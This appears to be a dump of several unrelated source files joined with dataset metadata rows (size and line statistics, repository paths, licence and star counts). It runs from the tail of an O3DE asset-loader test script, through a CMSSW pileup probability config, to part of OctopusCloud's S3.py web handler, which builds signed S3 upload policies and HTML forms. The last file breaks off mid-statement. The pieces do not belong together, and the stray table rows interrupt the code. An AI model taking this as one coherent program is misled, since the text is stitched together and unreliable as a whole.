def path_is_valid_asset(asset_path):
asset_id = asset.AssetCatalogRequestBus(bus.Broadcast, "GetAssetIdByPath", asset_path, math.Uuid(), False)
return asset_id.invoke("IsValid")
def areAllProductAssetsInvalid(assetList):
"""
Returns true if all asset paths in @assetList are NOT valid assets.
"""
for assetPath in assetList:
if path_is_valid_asset(assetPath):
return False
return True
def WaitUntilProductAssetsAreRemoved(assetList, waitTimeSeconds = 30):
"""
Given a list of asset paths, this function waits at most @waitTimeSeconds
or returns earlier if none of those asset paths exist in the Asset Cache.
"""
boundFunction = partial(areAllProductAssetsInvalid, assetList)
return helper.wait_for_condition(boundFunction, waitTimeSeconds)
def CopyFile(srcPath, dstPath):
dstDir = os.path.dirname(dstPath)
if not os.path.isdir(dstDir):
os.makedirs(dstDir)
try:
shutil.copyfile(srcPath, dstPath)
return True
except BaseException as error:
general.log(f"ERROR: {error}")
return False
def AllAssetsAreReadyPredicate(entityIdWithAsyncLoadTestComponent):
"""
A predicate function what will be used in wait_for_condition.
"""
pendingCount = aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "GetCountOfPendingAssets", entityIdWithAsyncLoadTestComponent)
return pendingCount == 0
def run():
# Define the source and product assets we will work with:
sourceTxtList, sourceTempList, productList = GetAssetsLists()
#Before we start we must delete the temporary source assets.
DeleteFilesInList(sourceTempList)
helper.init_idle()
helper.open_level("EmptyLevel")
myEntityId = CreateEntityWithComponent("TheAssetLoader", "AssetCollectionAsyncLoaderTest")
if myEntityId is None:
return
if not WaitUntilProductAssetsAreRemoved(productList):
general.log("ERROR: The AP did not removed the producs")
return
#Start with a clean slate, cancel any pending jobs.
aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "CancelLoadingAssets", myEntityId)
expectedEmptyList = aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "GetPendingAssetsList", myEntityId)
if len(expectedEmptyList) != 0:
general.log(f"ERROR: Was expecting 0 pending assets, instead got {len(expectedEmptyList)} pending assets")
return
# Let's submit a list of asset that don't exist yet, the AssetCollectionAsyncLoader should
# accept and start a background job to load the assets. Because the assets don't exist in
# the asset processor cache, the list of pending assets should be identical to the input list.
if not aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "StartLoadingAssetsFromAssetList", myEntityId, productList):
general.log(f"ERROR: Failed to submit assets for asynchronous loading. Tried to submit {len(productList)} assets for loading.")
return
general.log(f"SUCCESS: Assets were queued for loading. Total count: {len(productList)}")
# Wait 1 second. In theory we could wait here forever, but for the sake of expedience 1 second is enough
# to prove the point.
general.idle_wait(1.0)
# Because the input list has assets that will never exist, We expected the pending asset list to have the same
# items as original asset list.
pendingAssetList = aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "GetPendingAssetsList", myEntityId)
if len(productList) != len(pendingAssetList):
general.log(f"ERROR: Was expecting the same list size. original list size={len(productList)}, pending list size={len(pendingAssetList)}")
return
# Also make sure lists content are identical
for assetPath in productList:
if not assetPath in pendingAssetList:
general.log(f"ERROR: Asset is not present in the pending list: {assetPath}")
return
general.log("SUCCESS: Pending list contains the same asset paths as the original list")
# Expect error when tying to validate if a given asset was loaded.
for assetPath in productList:
if aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "ValidateAssetWasLoaded", myEntityId, assetPath):
general.log(f"ERROR: Asset should not be available: {assetPath}")
return
general.log("SUCCESS: No asset was available")
# Cancel the load operation and make sure there are no pending assets to load.
aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "CancelLoadingAssets", myEntityId)
expectedEmptyList = aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "GetPendingAssetsList", myEntityId)
if len(expectedEmptyList) != 0:
general.log(f"ERROR: Was expecting 0 pending assets, instead got {len(expectedEmptyList)} pending assets")
return
general.log("SUCCESS: Cancelled an impossible job")
# Now we are going to create a request for the same assets as before,
# But this time around the source assets will eventually exist.
if not aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "StartLoadingAssetsFromAssetList", myEntityId, productList):
general.log(f"ERROR: Failed to submit assets for asynchronous loading. Tried to submit {len(productList)} assets for loading.")
return
general.log(f"SUCCESS: Assets were queued for loading. Total count: {len(productList)}")
#Let's create the source assets.
for src, dst in zip(sourceTxtList, sourceTempList):
if not CopyFile(src, dst):
general.log(f"ERROR: Failed to copy temp source asset [{src}] as [{dst}]")
return
general.log("SUCCESS: created the temporary source assets. Waiting for assets to be processed...")
boundFunction = partial(AllAssetsAreReadyPredicate, myEntityId)
if not helper.wait_for_condition(boundFunction, 3600.0):
general.log("ERROR: Failed to load assets asynchronously")
return
general.log("SUCCESS: The AssetCollectionAsyncLoader loaded all requested assets. One more final verification...")
for assetPath in productList:
if not aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "ValidateAssetWasLoaded", myEntityId, assetPath):
general.log(f"ERROR: Asset should be available: {assetPath}")
return
general.log("SUCCESS: The AssetCollectionAsyncLoader PASSED the test")
#Cleanup
aztest.AssetCollectionAsyncLoaderTestBus(bus.Event, "CancelLoadingAssets", myEntityId)
DeleteFilesInList(sourceTempList)
if __name__ == "__main__":
run()
| 43.411067 | 145 | 0.726851 |
ace94d6eba712c46e5379e6374836f0bca359634 | 2,260 | py | Python | SimGeneral/MixingModule/python/mix_2018_25ns_UltraLegacy_PoissonOOTPU_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | SimGeneral/MixingModule/python/mix_2018_25ns_UltraLegacy_PoissonOOTPU_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | SimGeneral/MixingModule/python/mix_2018_25ns_UltraLegacy_PoissonOOTPU_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from SimGeneral.MixingModule.mix_probFunction_25ns_PoissonOOTPU_cfi import *
mix.input.nbPileupEvents.probFunctionVariable = cms.vint32(
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98
)
mix.input.nbPileupEvents.probValue = cms.vdouble(
8.89374611122e-07, 1.1777062868e-05, 3.99725585118e-05, 0.000129888015252, 0.000265224848687,
0.000313088635109, 0.000353781668514, 0.000508787237162, 0.000873670065767, 0.00147166880932,
0.00228230649018, 0.00330375581273, 0.00466047608406, 0.00624959203029, 0.00810375867901,
0.010306521821, 0.0129512453978, 0.0160303925502, 0.0192913204592, 0.0223108613632,
0.0249798930986, 0.0273973789867, 0.0294402350483, 0.031029854302, 0.0324583524255,
0.0338264469857, 0.0351267479019, 0.0360320204259, 0.0367489568401, 0.0374133183052,
0.0380352633799, 0.0386200967002, 0.039124376968, 0.0394201612616, 0.0394673457109,
0.0391705388069, 0.0384758587461, 0.0372984548399, 0.0356497876549, 0.0334655175178,
0.030823567063, 0.0278340752408, 0.0246009685048, 0.0212676009273, 0.0180250593982,
0.0149129830776, 0.0120582333486, 0.00953400069415, 0.00738546929512, 0.00563442079939,
0.00422052915668, 0.00312446316347, 0.00228717533955, 0.00164064894334, 0.00118425084792,
0.000847785826565, 0.000603466454784, 0.000419347268964, 0.000291768785963, 0.000199761337863,
0.000136624574661, 9.46855200945e-05, 6.80243180179e-05, 4.94806013765e-05, 3.53122628249e-05,
2.556765786e-05, 1.75845711623e-05, 1.23828210848e-05, 9.31669724108e-06, 6.0713272037e-06,
3.95387384933e-06, 2.02760874107e-06, 1.22535149516e-06, 9.79612472109e-07, 7.61730246474e-07,
4.2748847738e-07, 2.41170461205e-07, 1.38701083552e-07, 3.37678010922e-08, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0
)
| 57.948718 | 98 | 0.699558 |
ace94da561e189b566a66d7241b409dcb2ff14f9 | 31,436 | py | Python | s3/S3.py | christianbaun/octopuscloud | 92e6da659eb645f0e782f1565f2063ab2370a742 | [
"Apache-2.0"
] | 2 | 2018-11-13T01:36:23.000Z | 2019-09-29T06:24:03.000Z | s3/S3.py | christianbaun/octopuscloud | 92e6da659eb645f0e782f1565f2063ab2370a742 | [
"Apache-2.0"
] | null | null | null | s3/S3.py | christianbaun/octopuscloud | 92e6da659eb645f0e782f1565f2063ab2370a742 | [
"Apache-2.0"
] | 1 | 2020-07-25T20:01:52.000Z | 2020-07-25T20:01:52.000Z | #!/usr/bin/env python
import os
import re
import hmac, sha
# this is needed for the encyption
import base64
# Configuration file
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext import db
from google.appengine.ext.webapp import template
from google.appengine.api.urlfetch import DownloadError
from library import aktuelle_sprache
from library import navigations_bar_funktion
from library import format_error_message_green
from library import format_error_message_red
from library import logins3
from library import aws_access_key_erhalten
from library import aws_secret_access_key_erhalten
from library import endpointurl_erhalten
from library import port_erhalten
from library import get_second_list
from dateutil.parser import *
from error_messages import error_messages
# this is needed for the encyption
from itertools import izip, cycle
from ConfigParser import SafeConfigParser
parser = SafeConfigParser()
parser.read('simple.cfg')
class S3(webapp.RequestHandler):
def get(self):
# self.response.out.write('posted!')
# Get username
username = users.get_current_user()
if not username:
self.redirect('/')
# Get error messages if any exist
message = self.request.get('message')
# Datastore query that checks if any credentials for this user exist
testen = db.GqlQuery("SELECT * FROM OctopusCloudDatenbank WHERE user = :username_db", username_db=username)
# How many entries of this user exist?
anzahl = testen.count()
# Get the result of your datastore query
results = testen.fetch(100)
if not results:
self.redirect('/')
else:
# Datastore query that checks if credentials for Amazon S3 exist
testen = db.GqlQuery("SELECT * FROM OctopusCloudDatenbank WHERE user = :username_db AND zugangstyp = :zugangstyp_db", username_db=username, zugangstyp_db="Amazon")
# Get the result of your datastore query
results = testen.fetch(100)
if results:
# If credentials for Amazon S3 exist
aktuellezone = "Amazon"
eucalyptusname = "Amazon"
else:
# No credentials for Amazon S3 exist
# Datastore query that checks if credentials for a Walrus (Eucalyptus) Private Cloud exist
testen = db.GqlQuery("SELECT * FROM OctopusCloudDatenbank WHERE user = :username_db AND zugangstyp = :zugangstyp_db", username_db=username, zugangstyp_db="Eucalyptus")
# Get the result of your datastore query
results = testen.fetch(100)
if results:
# If credentials for an Walrus (Eucalyptus) Private Cloud exist
aktuellezone = "Eucalyptus"
# Get the credentials for the Walrus (Eucalyptus) Private Cloud
anzahl = testen.count()
for test in results:
eucalyptusname = str(test.eucalyptusname)
else:
# If no Walrus (Eucalyptus) credentials are given, we jump back to the root window
self.redirect('/')
# Get the language of the user
sprache = aktuelle_sprache(username)
# Generate the navigations bar
navigations_bar = navigations_bar_funktion(sprache)
url = users.create_logout_url(self.request.uri).replace('&', '&').replace('&amp;', '&')
url_linktext = 'Logout'
# If the language is not set to german, it is set here to english
if sprache != "de":
sprache = "en"
input_error_message = error_messages.get(message, {}).get(sprache)
# If no error messages exist, the result here is "None".
if input_error_message == None:
input_error_message = ""
# These error messages are formated in green...
if message in ("111", "118", "120"):
# This helper function formats in green
input_error_message = format_error_message_green(input_error_message)
# These error messages are formated in red...
elif message in ("112", "119", "121"):
input_error_message = format_error_message_red(input_error_message)
else:
input_error_message = ""
# Get Access Kkey for storage service that is used to display the list of keys
AWSAccessKeyId = aws_access_key_erhalten(username,eucalyptusname)
# Get Secret Access Key for storage service that is used to display the list of keys
AWSSecretAccessKeyId = aws_secret_access_key_erhalten(username,eucalyptusname)
# Connect with storage service
conn_s3, regionname = logins3(username, aktuellezone)
# Get values from the config file
# The name of the bucket that is used
# The character "@" cannot be used. Therefore we use "at".
bucketname = str(parser.get('bucket', 'bucketname'))+str(username).replace('@', 'at').replace('.', '-')
try:
# Connect with bucket
bucket_instance = conn_s3.get_bucket(bucketname)
except:
# When it didn't work
if sprache == "de":
bucket_keys_tabelle = '<font color="red">Es ist zu einem Fehler gekommen</font>'
else:
bucket_keys_tabelle = '<font color="red">An error occured</font>'
laenge_liste_keys = 0
else:
# When it worked...
try:
# Get a list of all keys inside the bucket
liste_keys = bucket_instance.get_all_keys()
except:
# When it didn't work
if sprache == "de":
bucket_keys_tabelle = '<font color="red">Es ist zu einem Fehler gekommen</font>'
else:
bucket_keys_tabelle = '<font color="red">An error occured</font>'
laenge_liste_keys = 0
else:
# When it worked...
# Number of keys inside the list
laenge_liste_keys = len(liste_keys)
# When using Walrus (Eucalyptus), we need to erase the stupid "None" entry.
# if aktuellezone != "Amazon":
# liste_keys2 = []
# for i in range(laenge_liste_keys):
# if str(liste_keys[i].name) != 'None':
# liste_keys2.append(liste_keys[i])
# laenge_liste_keys2 = len(liste_keys2)
# laenge_liste_keys = laenge_liste_keys2
# liste_keys = liste_keys2
# If we have more than one storage services, we need to compare the MD5 checksums
if anzahl > 1:
# If we have keys inside the bucket, we need to create a list that contains the MD5 checksums
if laenge_liste_keys == 0:
# Create an empty List
Main_Liste = []
# Length of the List
Main_Liste_laenge = len(Main_Liste)
Second_list = get_second_list(username, aktuellezone, eucalyptusname)
Second_list_laenge = len(Second_list)
else:
# if laenge_liste_keys is not 0
# Create an empty List
Main_Liste = []
# Walk through the list of keys
for i in range(laenge_liste_keys):
# In S3 each MD5 checksum is enclosed by double quotes. In Walrus they are not
Main_Liste.append(str(liste_keys[i].etag).replace('"',''))
# Sort the List
Main_Liste.sort()
# Length of the List
Main_Liste_laenge = len(Main_Liste)
Second_list = get_second_list(username, aktuellezone, eucalyptusname)
Second_list_laenge = len(Second_list)
# self.response.out.write(Main_Liste)
# self.response.out.write(Main_Liste_laenge)
# self.response.out.write(Second_list)
# self.response.out.write(Second_list_laenge)
if laenge_liste_keys == 0:
# No keys have been imported yet!
if sprache == "de":
bucket_keys_tabelle = 'Sie haben noch keine Dateien importiert.'
else:
bucket_keys_tabelle = 'No keys have been imported yet.'
else:
# There are keys in the bucket
bucket_keys_tabelle = ''
bucket_keys_tabelle = bucket_keys_tabelle + '<table border="3" cellspacing="0" cellpadding="5">'
bucket_keys_tabelle = bucket_keys_tabelle + '<tr>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th> </th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th> </th>'
if sprache == "de":
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="left">Keys</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Dateigröße</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Letzte Änderung</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Zugriffsberechtigung</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Prüfsumme (MD5)</th>'
else:
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="left">Keys</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Filesize</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Last Modified</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">Access Control List</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '<th align="center">MD5</th>'
bucket_keys_tabelle = bucket_keys_tabelle + '</tr>'
for i in range(laenge_liste_keys):
bucket_keys_tabelle = bucket_keys_tabelle + '<tr>'
if liste_keys[i].name == None and aktuellezone != "Amazon":
bucket_keys_tabelle = bucket_keys_tabelle + '<td> </td>'
else:
bucket_keys_tabelle = bucket_keys_tabelle + '<td>'
bucket_keys_tabelle = bucket_keys_tabelle + '<a href="/bucketkeyentfernen?md5hash='
bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].etag).replace('"','')
if sprache == "de":
bucket_keys_tabelle = bucket_keys_tabelle + '" title="Key löschen"><img src="bilder/delete.png" width="16" height="16" border="0" alt="Key löschen"></a>'
else:
bucket_keys_tabelle = bucket_keys_tabelle + '" title="erase key"><img src="bilder/delete.png" width="16" height="16" border="0" alt="erase key"></a>'
bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
if liste_keys[i].name == None and aktuellezone != "Amazon":
bucket_keys_tabelle = bucket_keys_tabelle + '<td> </td>'
else:
bucket_keys_tabelle = bucket_keys_tabelle + '<td>'
if sprache == "de":
bucket_keys_tabelle = bucket_keys_tabelle + '<img src="bilder/document.png" width="16" height="16" border="0" alt="Datei">'
else:
bucket_keys_tabelle = bucket_keys_tabelle + '<img src="bilder/document.png" width="16" height="16" border="0" alt="File">'
bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
bucket_keys_tabelle = bucket_keys_tabelle + '<td>'
bucket_keys_tabelle = bucket_keys_tabelle + '<a href="'
bucket_keys_tabelle = bucket_keys_tabelle + liste_keys[i].generate_url(600, method='GET', headers=None, query_auth=True, force_http=False).replace('&', '&').replace('&amp;', '&')
bucket_keys_tabelle = bucket_keys_tabelle + '">'
bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].name)
bucket_keys_tabelle = bucket_keys_tabelle + '</a>'
bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
bucket_keys_tabelle = bucket_keys_tabelle + '<td align="right">'
if liste_keys[i].name == None and aktuellezone != "Amazon":
bucket_keys_tabelle = bucket_keys_tabelle + ' '
else:
bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].size)
bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
bucket_keys_tabelle = bucket_keys_tabelle + '<td>'
# Format ISO8601 timestring for better looking.
if liste_keys[i].name == None and aktuellezone != "Amazon":
bucket_keys_tabelle = bucket_keys_tabelle + ' '
else:
datum_der_letzten_aenderung = parse(liste_keys[i].last_modified)
bucket_keys_tabelle = bucket_keys_tabelle + str(datum_der_letzten_aenderung.strftime("%Y-%m-%d %H:%M:%S"))
bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
bucket_keys_tabelle = bucket_keys_tabelle + '<td align="center">'
bucket_keys_tabelle = bucket_keys_tabelle + '<a href="/acl_einsehen?key='
bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].name)
bucket_keys_tabelle = bucket_keys_tabelle + '&md5hash='
bucket_keys_tabelle = bucket_keys_tabelle + str(liste_keys[i].etag).replace('"','')
if sprache == "de":
bucket_keys_tabelle = bucket_keys_tabelle + '" title="ACL einsehen/ändern">ACL einsehen/ändern</a>'
else:
bucket_keys_tabelle = bucket_keys_tabelle + '" title="view/edit ACL">view/edit ACL</a>'
bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
bucket_keys_tabelle = bucket_keys_tabelle + '<td align="center">'
bucket_keys_tabelle = bucket_keys_tabelle + '<tt>'+str(liste_keys[i].etag).replace('"','')+'</tt>'
bucket_keys_tabelle = bucket_keys_tabelle + '</td>'
bucket_keys_tabelle = bucket_keys_tabelle + '</tr>'
bucket_keys_tabelle = bucket_keys_tabelle + '</table>'
#Documentation about howto upload keys into S3
#http://docs.amazonwebservices.com/AmazonS3/latest/index.html?HTTPPOSTForms.html
#http://doc.s3.amazonaws.com/proposals/post.html
#http://developer.amazonwebservices.com/connect/entry.jspa?externalID=1434
#http://s3.amazonaws.com/doc/s3-example-code/post/post_sample.html
# Create the policy dokument
# expiration date is specified in ISO 8601 format.
policy_document = ''
policy_document = policy_document + '{'
policy_document = policy_document + '"expiration": "2100-01-01T00:00:00Z",'
policy_document = policy_document + '"conditions": ['
policy_document = policy_document + '{"bucket": "'+bucketname+'"}, '
policy_document = policy_document + '["starts-with", "$acl", ""],'
policy_document = policy_document + '{"success_action_redirect": "http://cloudoctopus.appspot.com/S3"},'
policy_document = policy_document + '["starts-with", "$key", ""],'
policy_document = policy_document + '["starts-with", "$Content-Type", ""]'
policy_document = policy_document + ']'
policy_document = policy_document + '}'
# Encode the policy document using Base64
policy = base64.b64encode(policy_document)
# Calculate the signature with the Secret Access Key and the policy
signature = base64.b64encode(hmac.new(AWSSecretAccessKeyId, policy, sha).digest())
# This is done all before.
# !!! Silly programming !!!
# Get data out of the DB
alledaten = db.GqlQuery("SELECT * FROM OctopusCloudDatenbank WHERE user = :username_db", username_db=username)
# How many entries for this user exist?
alledaten_clount = alledaten.count()
# Get all data of user
alledaten_ergebnisse = alledaten.fetch(100)
i = 0
# Walk through every line of the user in the DB
for alledatendurchlauf in alledaten_ergebnisse:
i = i + 1
if i == 1:
regionname1 = str(alledatendurchlauf.regionname)
endpointurl1 = str(alledatendurchlauf.endpointurl)
accesskey1 = str(alledatendurchlauf.accesskey)
zugangstyp1 = str(alledatendurchlauf.zugangstyp)
eucalyptusname1 = str(alledatendurchlauf.eucalyptusname)
port1 = str(alledatendurchlauf.port)
ziel_adresse_upload1 = endpointurl1 + '/'
AWSSecretAccessKeyId1 = aws_secret_access_key_erhalten(username,eucalyptusname1)
signature1 = base64.b64encode(hmac.new(AWSSecretAccessKeyId1, policy, sha).digest())
else:
regionname2 = str(alledatendurchlauf.regionname)
endpointurl2 = str(alledatendurchlauf.endpointurl)
accesskey2 = str(alledatendurchlauf.accesskey)
zugangstyp2 = str(alledatendurchlauf.zugangstyp)
eucalyptusname2 = str(alledatendurchlauf.eucalyptusname)
port2 = str(alledatendurchlauf.port)
ziel_adresse_upload2 = endpointurl2 + '/'
AWSSecretAccessKeyId2 = aws_secret_access_key_erhalten(username,eucalyptusname2)
signature2 = base64.b64encode(hmac.new(AWSSecretAccessKeyId2, policy, sha).digest())
# self.response.out.write(regionname1 + '<BR>')
# self.response.out.write(zugangstyp1 + '<BR>')
# self.response.out.write(eucalyptusname1 + '<BR>')
# self.response.out.write(accesskey1 + '<BR>')
# self.response.out.write(AWSSecretAccessKeyId1 + '<BR>')
# self.response.out.write(ziel_adresse_upload1+bucketname + '<BR>')
#
# self.response.out.write(regionname2 + '<BR>')
# self.response.out.write(zugangstyp2 + '<BR>')
# self.response.out.write(eucalyptusname2 + '<BR>')
# self.response.out.write(accesskey2 + '<BR>')
# self.response.out.write(AWSSecretAccessKeyId2 + '<BR>')
# self.response.out.write(ziel_adresse_upload2+bucketname + '<BR>')
ajax_formular = ''
ajax_formular = ajax_formular + '<script type="text/javascript" src="jquery.min.js"></script>\n'
ajax_formular = ajax_formular + '<script type="text/javascript" src="upload.js"></script>\n'
ajax_formular = ajax_formular + '<script type="text/javascript" src="jquery.blockUI.js"></script>\n'
ajax_formular = ajax_formular + '<script type="text/javascript">'
if anzahl == 1:
# if aktuellezone == "Eucalyptus":
# endpointurl = endpointurl_erhalten(username,eucalyptusname)
# port = port_erhalten(username,eucalyptusname)
# ziel_adresse = str(endpointurl) + ':' + str(port) + '/services/Walrus/'
if aktuellezone == "GoogleStorage":
ziel_adresse = 'commondatastorage.googleapis.com/'
else:
# aktuellezone == "Amazon":
ziel_adresse = 's3.amazonaws.com/'
ajax_formular = ajax_formular + 'var data = ['
ajax_formular = ajax_formular + '{sUrl:"http://'+ziel_adresse+bucketname+'",'
ajax_formular = ajax_formular + ' success_action_redirect:"http://cloudoctopus.appspot.com/S3",'
ajax_formular = ajax_formular + ' AWSAccessKeyId:"'+AWSAccessKeyId+'",'
ajax_formular = ajax_formular + ' policy:"'+policy+'",'
ajax_formular = ajax_formular + ' signature:"'+signature+'"}'
ajax_formular = ajax_formular + '];'
else:
ajax_formular = ajax_formular + 'var data = ['
ajax_formular = ajax_formular + '{sUrl:"http://'+ziel_adresse_upload1+bucketname+'",'
ajax_formular = ajax_formular + ' success_action_redirect:"http://cloudoctopus.appspot.com/S3",'
ajax_formular = ajax_formular + ' AWSAccessKeyId:"'+accesskey1+'",'
ajax_formular = ajax_formular + ' policy:"'+policy+'",'
ajax_formular = ajax_formular + ' signature:"'+signature1+'"}'
ajax_formular = ajax_formular + ' ,'
ajax_formular = ajax_formular + ' {sUrl:"http://'+ziel_adresse_upload2+bucketname+'",'
ajax_formular = ajax_formular + ' success_action_redirect:"http://cloudoctopus.appspot.com/S3",'
ajax_formular = ajax_formular + ' AWSAccessKeyId:"'+accesskey2+'",'
ajax_formular = ajax_formular + ' policy:"'+policy+'",'
ajax_formular = ajax_formular + ' signature:"'+signature2+'"}'
ajax_formular = ajax_formular + '];'
ajax_formular = ajax_formular + '</script>\n'
keys_upload_formular = '<p> </p>\n'
keys_upload_formular = keys_upload_formular + '<form target="frame1" id="form1" action="" method="post" enctype="multipart/form-data">\n'
keys_upload_formular = keys_upload_formular + '<table border="0" cellspacing="0" cellpadding="5">'
keys_upload_formular = keys_upload_formular + '<tr>'
keys_upload_formular = keys_upload_formular + '<td>'
keys_upload_formular = keys_upload_formular + '<input type="hidden" name="key" value="${filename}">\n'
keys_upload_formular = keys_upload_formular + '<select name="acl" size="1">\n'
keys_upload_formular = keys_upload_formular + '<option selected="selected">public-read</option>\n'
keys_upload_formular = keys_upload_formular + '<option>private</option>\n'
keys_upload_formular = keys_upload_formular + '<option>public-read-write</option>\n'
keys_upload_formular = keys_upload_formular + '<option>authenticated-read</option>\n'
keys_upload_formular = keys_upload_formular + '</select>\n'
keys_upload_formular = keys_upload_formular + '<select name="Content-Type" size="1">\n'
keys_upload_formular = keys_upload_formular + '<option selected="selected">application/octet-stream</option>\n'
keys_upload_formular = keys_upload_formular + '<option>application/pdf</option>\n'
keys_upload_formular = keys_upload_formular + '<option>application/zip</option>\n'
keys_upload_formular = keys_upload_formular + '<option>audio/mp4</option>\n'
keys_upload_formular = keys_upload_formular + '<option>audio/mpeg</option>\n'
keys_upload_formular = keys_upload_formular + '<option>audio/ogg</option>\n'
keys_upload_formular = keys_upload_formular + '<option>audio/vorbis</option>\n'
keys_upload_formular = keys_upload_formular + '<option>image/gif</option>\n'
keys_upload_formular = keys_upload_formular + '<option>image/jpeg</option>\n'
keys_upload_formular = keys_upload_formular + '<option>image/png</option>\n'
keys_upload_formular = keys_upload_formular + '<option>image/tiff</option>\n'
keys_upload_formular = keys_upload_formular + '<option>text/html</option>\n'
keys_upload_formular = keys_upload_formular + '<option>text/plain</option>\n'
keys_upload_formular = keys_upload_formular + '<option>video/mp4</option>\n'
keys_upload_formular = keys_upload_formular + '<option>video/mpeg</option>\n'
keys_upload_formular = keys_upload_formular + '<option>video/ogg</option>\n'
keys_upload_formular = keys_upload_formular + '</select>\n'
keys_upload_formular = keys_upload_formular + '</td>\n'
keys_upload_formular = keys_upload_formular + '</tr>\n'
keys_upload_formular = keys_upload_formular + '<tr>\n'
keys_upload_formular = keys_upload_formular + '<td>\n'
keys_upload_formular = keys_upload_formular + '<input type="hidden" id="success_action_redirect" name="success_action_redirect" value="">\n'
keys_upload_formular = keys_upload_formular + '<input type="hidden" id="AWSAccessKeyId" name="AWSAccessKeyId" value="">\n'
keys_upload_formular = keys_upload_formular + '<input type="hidden" id="policy" name="policy" value="">\n'
keys_upload_formular = keys_upload_formular + '<input type="hidden" id="signature" name="signature" value="">\n'
#keys_upload_formular = keys_upload_formular + '<input type="hidden" id="submit" name="submit" value="submit">\n'
keys_upload_formular = keys_upload_formular + '</td>\n'
keys_upload_formular = keys_upload_formular + '</tr>\n'
keys_upload_formular = keys_upload_formular + '<tr>\n'
keys_upload_formular = keys_upload_formular + '<td>\n'
keys_upload_formular = keys_upload_formular + '<input type="file" name="file" size="80">\n'
keys_upload_formular = keys_upload_formular + '</td>\n'
keys_upload_formular = keys_upload_formular + '</tr>\n'
# Traditional Way to upload a Key into S3
keys_upload_formular = keys_upload_formular + '<tr>'
keys_upload_formular = keys_upload_formular + '<td>'
if sprache == "de":
keys_upload_formular = keys_upload_formular + '<input type="submit" style="display:none" id="button2" name="submit" value="Datei hochladen">\n'
else:
keys_upload_formular = keys_upload_formular + '<input type="submit" style="display:none" id="button2" name="submit" value="upload file">\n'
keys_upload_formular = keys_upload_formular + '</td>'
keys_upload_formular = keys_upload_formular + '</tr>'
keys_upload_formular = keys_upload_formular + '</table>\n'
keys_upload_formular = keys_upload_formular + '</form>'
keys_upload_formular = keys_upload_formular + '\n'
keys_upload_formular = keys_upload_formular + '<div id="statustext"></div>'
keys_upload_formular = keys_upload_formular + '<div style="border:1px solid black;width:200px;height:20px"><div id="statusbar" style="background-color:black;width:1px;height:20px"> </div></div>'
if sprache == "de":
keys_upload_formular = keys_upload_formular + '<button id="button1">Datei hochladen</button>'
else:
keys_upload_formular = keys_upload_formular + '<button id="button1">upload file</button>'
iframe = '<iframe id="frame1" name="frame1" style="display:none"></iframe>'
if laenge_liste_keys != 0:
alle_keys_loeschen_button = '<p> </p>\n'
alle_keys_loeschen_button = alle_keys_loeschen_button + '<form action="/alle_keys_loeschen" method="get">\n'
alle_keys_loeschen_button = alle_keys_loeschen_button + '<input type="hidden" name="s3_ansicht" value="pur"> \n'
alle_keys_loeschen_button = alle_keys_loeschen_button + '<input type="hidden" name="bucket_name" value="'+bucketname+'"> \n'
if sprache == "de":
alle_keys_loeschen_button = alle_keys_loeschen_button + '<input type="submit" value="Alle Keys löschen">\n'
else:
alle_keys_loeschen_button = alle_keys_loeschen_button + '<input type="submit" value="Erase all keys">\n'
alle_keys_loeschen_button = alle_keys_loeschen_button + '</form>\n'
else:
alle_keys_loeschen_button = ''
if anzahl == 1:
if sprache == "de":
